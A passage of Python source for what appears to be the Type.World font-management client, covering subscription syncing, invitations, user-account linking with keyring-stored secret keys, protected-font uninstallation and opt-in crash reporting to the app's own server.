"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"userTimezone": self.timezone(),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/downloadUserSubscriptions", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
self.set("lastServerSync", int(time.time()))
return self.executeDownloadSubscriptions(response)
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def executeDownloadSubscriptions(self, response):
try:
oldURLs = self.secretSubscriptionURLs()
# Uninstall all protected fonts when app instance is reported as revoked
if response["appInstanceIsRevoked"]:
success, message = self.uninstallAllProtectedFonts()
if not success:
return False, message
# Verified Email Address
if "userAccountEmailIsVerified" in response:
self.set("userAccountEmailIsVerified", response["userAccountEmailIsVerified"])
            # User Account Status
if "userAccountStatus" in response:
self.set("userAccountStatus", response["userAccountStatus"])
# Website Token
if "typeWorldWebsiteToken" in response:
keyring = self.keyring()
keyring.set_password(
self.userKeychainKey(self.user()),
"typeWorldWebsiteToken",
response["typeWorldWebsiteToken"],
)
# Add new subscriptions
for incomingSubscription in response["heldSubscriptions"]:
# Incoming server timestamp
incomingServerTimestamp = None
if "serverTimestamp" in incomingSubscription and incomingSubscription["serverTimestamp"]:
incomingServerTimestamp = incomingSubscription["serverTimestamp"]
# Add new subscription
if incomingSubscription["url"] not in oldURLs:
success, message, publisher, subscription = self.addSubscription(
incomingSubscription["url"], remotely=True
)
if success:
if incomingServerTimestamp:
subscription.set("serverTimestamp", incomingServerTimestamp)
self.delegate._subscriptionHasBeenAdded(subscription, remotely=True)
else:
return (
False,
"Received from self.addSubscription() for %s: %s" % (incomingSubscription["url"], message),
)
# Update subscription
                else:
                    subscription = None
                    found = False
                    for publisher in self.publishers():
                        for subscription in publisher.subscriptions():
                            if subscription.url == URL(incomingSubscription["url"]).unsecretURL():
                                found = True
                                break
                        if found:
                            break
if (
incomingServerTimestamp
and subscription.get("serverTimestamp")
and int(incomingServerTimestamp) > int(subscription.get("serverTimestamp"))
) or (incomingServerTimestamp and not subscription.get("serverTimestamp")):
success, message, changes = subscription.update()
if success:
subscription.set("serverTimestamp", int(incomingServerTimestamp))
def replace_item(obj, key, replace_value):
for k, v in obj.items():
if v == key:
obj[k] = replace_value
return obj
# oldPendingInvitations = self.pendingInvitations()
# Invitations
self.set(
"acceptedInvitations",
[replace_item(x, None, "") for x in response["acceptedInvitations"]],
)
self.set(
"pendingInvitations",
[replace_item(x, None, "") for x in response["pendingInvitations"]],
)
self.set(
"sentInvitations",
[replace_item(x, None, "") for x in response["sentInvitations"]],
)
# newPendingInvitations = self.pendingInvitations()
# TODO: trigger notification
# import threading
# preloadThread = threading.Thread(target=self.preloadLogos)
# preloadThread.start()
# Delete subscriptions
for publisher in self.publishers():
for subscription in publisher.subscriptions():
                    if subscription.protocol.secretURL() not in [
                        x["url"] for x in response["heldSubscriptions"]
                    ] and subscription.protocol.unsecretURL() not in [
                        x["url"] for x in response["acceptedInvitations"]
                    ]:
subscription.delete(remotely=True)
self.delegate._userAccountHasBeenUpdated()
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
    def acceptInvitation(self, url):
        try:
            userID = self.user()
            if userID:
                self.appendCommands("acceptInvitation", [url])
                return self.performCommands()
            return False, "No user"
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performAcceptInvitation(self, urls):
try:
userID = self.user()
# Get Invitation IDs from urls
IDs = []
for invitation in self.pendingInvitations():
for url in urls:
if invitation.url == url:
if invitation.ID not in IDs:
IDs.append(invitation.ID)
# assert len(IDs) == len(urls)
if userID:
self.set("lastServerSync", int(time.time()))
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"subscriptionIDs": ",".join(IDs),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/acceptInvitations", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Success
return self.executeDownloadSubscriptions(response)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
    def declineInvitation(self, url):
        try:
            userID = self.user()
            if userID:
                self.appendCommands("declineInvitation", [url])
                return self.performCommands()
            return False, "No user"
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performDeclineInvitation(self, urls):
try:
userID = self.user()
# Get Invitation IDs from urls
IDs = []
for invitation in self.pendingInvitations():
for url in urls:
if invitation.url == url:
if invitation.ID not in IDs:
IDs.append(invitation.ID)
assert len(IDs) == len(urls)
if userID:
self.set("lastServerSync", int(time.time()))
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"subscriptionIDs": ",".join(IDs),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/declineInvitations", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Success
return self.executeDownloadSubscriptions(response)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def syncSubscriptions(self, performCommands=True):
try:
self.appendCommands("syncSubscriptions", self.secretSubscriptionURLs() or ["empty"])
if performCommands:
return self.performCommands()
else:
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performSyncSubscriptions(self, oldURLs):
try:
userID = self.user()
if userID:
if oldURLs == ["pending"]:
oldURLs = ["empty"]
self.set("lastServerSync", int(time.time()))
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"subscriptionURLs": ",".join(oldURLs),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/syncUserSubscriptions", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Add new subscriptions
for url in response["subscriptions"]:
if url not in oldURLs:
(
success,
message,
publisher,
subscription,
) = self.addSubscription(url, remotely=True)
if not success:
return False, message
# Success
return True, len(response["subscriptions"]) - len(oldURLs)
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def downloadSettings(self, performCommands=True):
try:
if performCommands:
return self.performDownloadSettings()
else:
self.appendCommands("downloadSettings")
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performDownloadSettings(self):
try:
parameters = {}
if self.user():
parameters["anonymousUserID"] = self.user()
parameters["secretKey"] = self.secretKey()
success, response, responseObject = self.performRequest(self.mothership + "/downloadSettings", parameters)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
self.set("downloadedSettings", response["settings"])
self.set("lastSettingsDownloaded", int(time.time()))
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def user(self):
try:
return self.get("typeworldUserAccount") or ""
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def userKeychainKey(self, ID):
try:
return "https://%s@%s.type.world" % (ID, self.anonymousAppID())
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def secretKey(self, userID=None):
try:
keyring = self.keyring()
return keyring.get_password(self.userKeychainKey(userID or self.user()), "secretKey")
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def userName(self):
try:
keyring = self.keyring()
return keyring.get_password(self.userKeychainKey(self.user()), "userName")
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def userEmail(self):
try:
keyring = self.keyring()
return keyring.get_password(self.userKeychainKey(self.user()), "userEmail")
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def createUserAccount(self, name, email, password1, password2):
try:
if self.online():
if not name or not email or not password1 or not password2:
return False, "#(RequiredFieldEmpty)"
if password1 != password2:
return False, "#(PasswordsDontMatch)"
parameters = {
"name": name,
"email": email,
"password": password1,
}
if self.secretServerAuthKey:
parameters["SECRETKEY"] = self.secretServerAuthKey
success, response, responseObject = self.performRequest(
self.mothership + "/createUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# success
return self.linkUser(response["anonymousUserID"], response["secretKey"])
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def deleteUserAccount(self, email, password):
try:
if self.online():
# Required parameters
if not email or not password:
return False, "#(RequiredFieldEmpty)"
# Unlink user first
if self.userEmail() == email:
success, message = self.performUnlinkUser()
if not success:
return False, message
parameters = {
"email": email,
"password": password,
}
success, response, responseObject = self.performRequest(
self.mothership + "/deleteUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# success
return True, None
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def resendEmailVerification(self):
try:
parameters = {
"email": self.userEmail(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/resendEmailVerification", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# success
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def logInUserAccount(self, email, password):
try:
if not email or not password:
return False, "#(RequiredFieldEmpty)"
if self.online():
parameters = {
"email": email,
"password": password,
}
success, response, responseObject = self.performRequest(
self.mothership + "/logInUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# success
return self.linkUser(response["anonymousUserID"], response["secretKey"])
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def linkUser(self, userID, secretKey):
try:
# Set secret key now, so it doesn't show up in preferences when offline
keyring = self.keyring()
keyring.set_password(self.userKeychainKey(userID), "secretKey", secretKey)
assert self.secretKey(userID) == secretKey
self.appendCommands("linkUser", userID)
self.appendCommands("syncSubscriptions")
self.appendCommands("downloadSubscriptions")
return self.performCommands()
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performLinkUser(self, userID):
try:
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"secretKey": self.secretKey(userID),
}
parameters = self.addMachineIDToParameters(parameters)
success, response, responseObject = self.performRequest(
self.mothership + "/linkTypeWorldUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Success
self.set("typeworldUserAccount", userID)
assert userID == self.user()
# ZMQ
topicID = "user-%s" % self.user()
self.registerZMQCallback(topicID, self.zmqCallback)
keyring = self.keyring()
if "userEmail" in response:
keyring.set_password(self.userKeychainKey(userID), "userEmail", response["userEmail"])
if "userName" in response:
keyring.set_password(self.userKeychainKey(userID), "userName", response["userName"])
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def linkedAppInstances(self):
try:
if not self.user():
return False, "No user"
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": self.user(),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(self.mothership + "/userAppInstances", parameters)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
class AppInstance(object):
pass
# Success
instances = []
for serverInstance in response["appInstances"]:
instance = AppInstance()
for key in serverInstance:
setattr(instance, key, serverInstance[key])
instances.append(instance)
return True, instances
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def revokeAppInstance(self, anonymousAppID=None):
try:
if not self.user():
return False, "No user"
parameters = {
"anonymousAppID": anonymousAppID or self.anonymousAppID(),
"anonymousUserID": self.user(),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(self.mothership + "/revokeAppInstance", parameters)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def reactivateAppInstance(self, anonymousAppID=None):
try:
if not self.user():
return False, "No user"
parameters = {
"anonymousAppID": anonymousAppID or self.anonymousAppID(),
"anonymousUserID": self.user(),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/reactivateAppInstance", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def unlinkUser(self):
try:
self.appendCommands("unlinkUser")
return self.performCommands()
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def uninstallAllProtectedFonts(self, dryRun=False):
try:
# Uninstall all protected fonts
for publisher in self.publishers():
for subscription in publisher.subscriptions():
                    (
                        success,
                        installableFontsCommand,
                    ) = subscription.protocol.installableFontsCommand()
                    assert success
                    fontIDs = []
                    for foundry in installableFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
# Dry run from central server: add all fonts to list
if dryRun and font.protected:
fontIDs.append(font.uniqueID) # nocoverage (This is executed only when the
# central server uninstalls *all* fonts)
# Run from local client, add only actually installed
# fonts
elif not dryRun and font.protected and subscription.installedFontVersion(font=font):
fontIDs.append(font.uniqueID)
if fontIDs:
success, message = subscription.removeFonts(fontIDs, dryRun=dryRun, updateSubscription=False)
if not success:
return False, message
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performUnlinkUser(self):
try:
userID = self.user()
success, response = self.uninstallAllProtectedFonts()
if not success:
return False, response
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/unlinkTypeWorldUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
continueFor = ["userUnknown"]
if response["response"] != "success" and not response["response"] in continueFor:
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
self.set("typeworldUserAccount", "")
self.set("userAccountEmailIsVerified", "")
self.remove("acceptedInvitations")
self.remove("pendingInvitations")
self.remove("sentInvitations")
# ZMQ
topicID = "user-%s" % userID
self.unregisterZMQCallback(topicID)
keyring = self.keyring()
keyring.delete_password(self.userKeychainKey(userID), "secretKey")
keyring.delete_password(self.userKeychainKey(userID), "userEmail")
keyring.delete_password(self.userKeychainKey(userID), "userName")
# Success
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def systemLocale(self):
try:
if not self._systemLocale:
if MAC:
from AppKit import NSLocale
self._systemLocale = str(NSLocale.preferredLanguages()[0].split("_")[0].split("-")[0])
                else:
                    import locale
                    # Fall back to English if the OS reports no default locale
                    self._systemLocale = (locale.getdefaultlocale()[0] or "en").split("_")[0]
return self._systemLocale
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
    def locale(self):
        """\
        Reads user locale from OS
        """
        try:
if self.get("localizationType") == "systemLocale":
_locale = [self.systemLocale()]
elif self.get("localizationType") == "customLocale":
_locale = [self.get("customLocaleChoice") or "en"]
else:
_locale = [self.systemLocale()]
if "en" not in _locale:
_locale.append("en")
return _locale
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
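    # Example: on a German system with no custom override, locale() returns
    # ["de", "en"]; "en" is always appended as a fallback.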
def expiringInstalledFonts(self):
try:
fonts = []
for publisher in self.publishers():
for subscription in publisher.subscriptions():
fonts.extend(subscription.expiringInstalledFonts())
return fonts
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def amountOutdatedFonts(self):
try:
amount = 0
for publisher in self.publishers():
amount += publisher.amountOutdatedFonts()
return amount
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def keyring(self):
try:
# Using keyring causes problems on all three MAC/WIN/LINUX
# when used headlessly in a CI environment,
            # so we’re using the dummy for CI, which sucks because
            # then you can’t thoroughly self-test it during the app build
if (CI and not self.inCompiledApp) or GAE:
keyring = dummyKeyRing
return keyring
import keyring # nocoverage
if MAC: # nocoverage
if self.inCompiledApp:
keyring.core.set_keyring(keyring.core.load_keyring("keyring.backends.macOS.Keyring")) # nocoverage
elif WIN: # nocoverage
keyring.core.set_keyring(
keyring.core.load_keyring("keyring.backends.Windows.WinVaultKeyring")
) # nocoverage
elif LINUX: # nocoverage
keyring.core.set_keyring(
keyring.core.load_keyring("keyring.backends.kwallet.DBusKeyring")
) # nocoverage
return keyring # nocoverage
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def handleTraceback(self, file=None, sourceMethod=None, e=None):
# Needs explicit permission, to be handled by UI
if self.get("sendCrashReports") or self.testing:
payload = f"""\
Version: {typeworld.api.VERSION}
{traceback.format_exc()}
"""
# Remove path parts to make tracebacks identical (so they don't re-surface)
def removePathPrefix(_payload, _snippet, _file):
m = re.search(r'File "(.+?)"', _payload, re.MULTILINE)
if m:
_file = m.group(1)
index = _file.find(_snippet)
if index != -1:
clientPathPrefix = _file[:index]
return _payload.replace(clientPathPrefix, "")
else:
return _payload
else:
return _payload # nocoverage (this seems to never get executed,
# because code always contains `File "..."` like it should.
# Leaving this here just in case) TODO
# Normalize file paths
if WIN:
payload = (
removePathPrefix(payload, "TypeWorld.exe", __file__)
.replace("\\", "/")
.replace("TypeWorld.exe", "app.py")
)
payload = removePathPrefix(payload, "typeworld/client/", __file__).replace("\\", "/")
payload = removePathPrefix(payload, "app.py", file).replace("\\", "/")
# Create supplementary information
supplementary = {
"os": OSName(),
"file": file or __file__,
"preferences": self._preferences.dictionary(),
}
if sourceMethod:
if hasattr(sourceMethod, "__self__") and sourceMethod.__self__:
supplementary["sourceMethodSignature"] = (
str(sourceMethod.__self__.__class__.__name__)
+ "."
+ str(sourceMethod.__name__)
+ str(inspect.signature(sourceMethod))
)
else:
supplementary["sourceMethodSignature"] = str( # nocoverage
sourceMethod.__name__ # nocoverage
) + str( # nocoverage
inspect.signature(sourceMethod) # nocoverage
) # nocoverage
# (currently not testing for calling this method without
# a sourceMethod parameter)
supplementary["traceback"] = payload
supplementary["stack"] = []
supplementary["trace"] = []
for s in inspect.stack():
supplementary["stack"].append(
{
"filename": str(s.filename),
"lineno": str(s.lineno),
"function": str(s.function),
"code_context": str(s.code_context[0].replace("\t", " ").rstrip()) if s.code_context else None,
}
)
for s in inspect.trace():
supplementary["trace"].append(
{
"filename": str(s.filename),
"lineno": str(s.lineno),
"function": str(s.function),
"code_context": str(s.code_context[0].replace("\t", " ").rstrip()) if s.code_context else None,
}
)
# replace faulty line of code (some Python versions include the faulty code
# line in the traceback output, some not)
if supplementary["trace"] and supplementary["trace"][0]["code_context"]:
payload = payload.replace(supplementary["trace"][0]["code_context"], "")
payload = payload.replace("\n \n", "\n")
parameters = {
"payload": payload,
"supplementary": json.dumps(supplementary),
}
# Submit to central server
# if self.online(self.mothership):
def handleTracebackWorker(self):
success, response, responseObject = self.performRequest(
self.mothership + "/handleTraceback", parameters
)
if success:
response = json.loads(response)
if response["response"] != "success":
self.log("handleTraceback() error on server, step 2: %s" % response)
if not success:
self.log("handleTraceback() error on server, step 1: %s" % response)
handleTracebackThread = threading.Thread(target=handleTracebackWorker, args=(self,))
handleTracebackThread.start()
# Log
if sourceMethod:
self.log(payload + "\nMethod signature:\n" + supplementary["sourceMethodSignature"])
else:
                self.log(payload)  # nocoverage
# (currently not testing for calling this method without a sourceMethod
# parameter)
return False, payload
def log(self, *arg):
string = "Type.World: %s" % " ".join(map(str, arg))
if MAC:
nslog(string)
else:
logging.debug(string)
def prepareUpdate(self):
self._subscriptionsUpdated = []
def allSubscriptionsUpdated(self):
try:
for publisher in self.publishers():
for subscription in publisher.subscriptions():
if subscription.stillUpdating():
return False
return True
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# # DEPRECATED, since resources are now handled by GUI since 0.2.10-beta
# def deleteResources(self, urls):
# try:
# resources = self.get("resources") or {}
# for url in urls:
# for key in resources.keys():
# if key.startswith(url):
# del resources[key]
# break
# self.set("resources", resources)
# except Exception as e: # nocoverage
# return self.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
# )
# # DEPRECATED, since resources are now handled by GUI since 0.2.10-beta
# def resourceByURL(self, url, binary=False, update=False):
# """Caches and returns content of a HTTP resource. If binary is set to True,
# content will be stored and return as a bas64-encoded string"""
# try:
# resources = self.get("resources") or {}
# key = f"{url},binary={binary}"
# # Load fresh
# if key not in resources or update:
# if self.testScenario:
# url = addAttributeToURL(url, "testScenario=%s" % self.testScenario)
# success, response, responseObject = request(url, method="GET")
# if not success:
# return False, response, responseObject.headers["content-type"]
# content = responseObject.content
# if binary:
# content = base64.b64encode(content).decode()
# else:
# content = content.decode()
# resources[key] = responseObject.headers["content-type"] + "," + content
# self.set("resources", resources)
# return True, content, responseObject.headers["content-type"]
# # Serve from cache
# else:
# response = resources[key]
# mimeType = response.split(",")[0]
# content = response[len(mimeType) + 1 :]
# return True, content, mimeType
# except Exception as e: # nocoverage
# return self.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
# )
def anonymousAppID(self):
try:
anonymousAppID = self.get("anonymousAppID")
if anonymousAppID is None or anonymousAppID == {}:
import uuid
anonymousAppID = str(uuid.uuid1())
self.set("anonymousAppID", anonymousAppID)
return anonymousAppID
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def endpointCommand(self, url):
try:
# Check for URL validity
success, response = urlIsValid(url)
if not success:
return False, response
            # Get the protocol; getProtocol() returns (success, protocolOrErrorMessage)
            success, protocol = getProtocol(url)
            if not success:
                return False, protocol
            protocol.client = self
# Get Root Command
return protocol.endpointCommand(testScenario=self.testScenario)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def reportAPIEndpointError(self, url):
reportThread = threading.Thread(target=self.reportAPIEndpointErrorWorker, args=(url,))
reportThread.start()
def reportAPIEndpointErrorWorker(self, url):
success, content, response = self.performRequest(
self.mothership + "/reportAPIEndpointError", {"subscriptionURL": url}
)
def addSubscription(
self,
url,
username=None,
password=None,
remotely=False,
JSON=None,
reportErrors=True,
):
try:
self._updatingProblem = None
# Check for URL validity
success, response = urlIsValid(url)
if not success:
return False, response, None, None
# Get subscription
success, message = getProtocol(url)
if success:
protocol = message
protocol.client = self
else:
return False, message, None, None
# Change secret key
if protocol.unsecretURL() in self.unsecretSubscriptionURLs():
# Initial endpointCommand
success, message = self.endpointCommand(url)
if success:
endpointCommand = message
else:
if reportErrors:
self.reportAPIEndpointError(url)
return False, message, None, None
protocol.setSecretKey(protocol.url.secretKey)
publisher = self.publisher(endpointCommand.canonicalURL)
subscription = publisher.subscription(protocol.unsecretURL(), protocol)
else:
# Initial Health Check
success, response = protocol.aboutToAddSubscription(
anonymousAppID=self.anonymousAppID(),
anonymousTypeWorldUserID=self.user(),
accessToken=protocol.url.accessToken,
testScenario=self.testScenario,
)
if not success:
message = response
# self._updatingProblem = [
# "#(response.loginRequired)",
# "#(response.loginRequired.headline)",
# ]
if reportErrors:
self.reportAPIEndpointError(url)
return False, message, None, None
# endpointCommand
success, endpointCommand = protocol.endpointCommand(testScenario=self.testScenario)
assert success
assert endpointCommand
# Breaking API Version Check
if "breakingAPIVersions" in self.get("downloadedSettings"):
breakingVersions = copy.copy(self.get("downloadedSettings")["breakingAPIVersions"])
if self.testScenario == "simulateBreakingAPIVersion":
versionParts = breakingVersions[-1].split(".")
versionParts[0] = str(int(versionParts[0]) + 1)
breakingVersions.append(".".join(versionParts))
success, rootCommand = protocol.rootCommand(testScenario=self.testScenario)
assert success
assert rootCommand
incomingVersion = rootCommand.version
for breakingVersion in breakingVersions:
# Breaking version is higher than local API version
if (
semver.VersionInfo.parse(breakingVersion).compare(typeworld.api.VERSION)
== 1
# Incoming version is higher than breaking
) and (semver.VersionInfo.parse(incomingVersion).compare(breakingVersion) == 1):
if reportErrors:
self.reportAPIEndpointError(url)
return (
False,
[
"#(response.appUpdateRequired)",
"#(response.appUpdateRequired.headline)",
],
None,
None,
)
# Commercial app check
if self.commercial and self.appID not in endpointCommand.allowedCommercialApps:
if reportErrors:
self.reportAPIEndpointError(url)
return (
False,
[
"#(response.commercialAppNotAllowed)",
"#(response.commercialAppNotAllowed.headline)",
],
None,
None,
)
publisher = self.publisher(endpointCommand.canonicalURL)
subscription = publisher.subscription(protocol.unsecretURL(), protocol)
# Success
subscription.save()
publisher.save()
subscription.stillAlive()
self.manageMessageQueueConnection()
self.delegate._subscriptionHasBeenAdded(subscription, remotely)
if not remotely and not self.externallyControlled:
success, message = self.uploadSubscriptions()
if not success:
return (
False,
message,
None,
None,
) # 'Response from client.uploadSubscriptions(): %s' %
return True, None, publisher, subscription
except Exception as e: # nocoverage
self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
return False, traceback.format_exc(), None, None
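    # A minimal usage sketch (illustrative; the client object and the URL are
    # assumptions, not part of the code above): addSubscription() returns a
    # four-tuple of (success, message, publisher, subscription).
    #
    #     success, message, publisher, subscription = client.addSubscription(url)
    #     if not success:
    #         print(message)  # either a string or a [text, headline] pair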
def publisher(self, canonicalURL):
try:
if canonicalURL not in self._publishers:
e = APIPublisher(self, canonicalURL)
self._publishers[canonicalURL] = e
if self.get("publishers") and canonicalURL in self.get("publishers"):
self._publishers[canonicalURL].exists = True
return self._publishers[canonicalURL]
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def publishers(self):
try:
if self.get("publishers"):
publishers = []
if self.get("publishers"):
for canonicalURL in self.get("publishers"):
publisher = self.publisher(canonicalURL)
if publisher.subscriptions():
publishers.append(publisher)
return publishers
else:
return []
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def files(self):
"Returns list of all resource URLs"
files = []
for publisher in self.publishers():
files = set(files) | set(publisher.files())
return list(set(files))
class APIPublisher(object):
"""\
Represents an API endpoint, identified and grouped by the canonical URL attribute
of the API responses. This API endpoint class can then hold several repositories.
"""
def __init__(self, parent, canonicalURL):
self.parent = parent
self.canonicalURL = canonicalURL
self.exists = False
self._subscriptions = {}
self._updatingSubscriptions = []
def folder(self):
try:
if WIN:
return os.path.join(os.environ["WINDIR"], "Fonts")
elif MAC:
from os.path import expanduser
home = expanduser("~")
folder = os.path.join(home, "Library", "Fonts", "Type.World App")
return folder
else:
import tempfile
return tempfile.gettempdir()
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def stillUpdating(self):
try:
return len(self._updatingSubscriptions) > 0
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def updatingProblem(self):
try:
problems = []
for subscription in self.subscriptions():
problem = subscription.updatingProblem()
if problem and problem not in problems:
problems.append(problem)
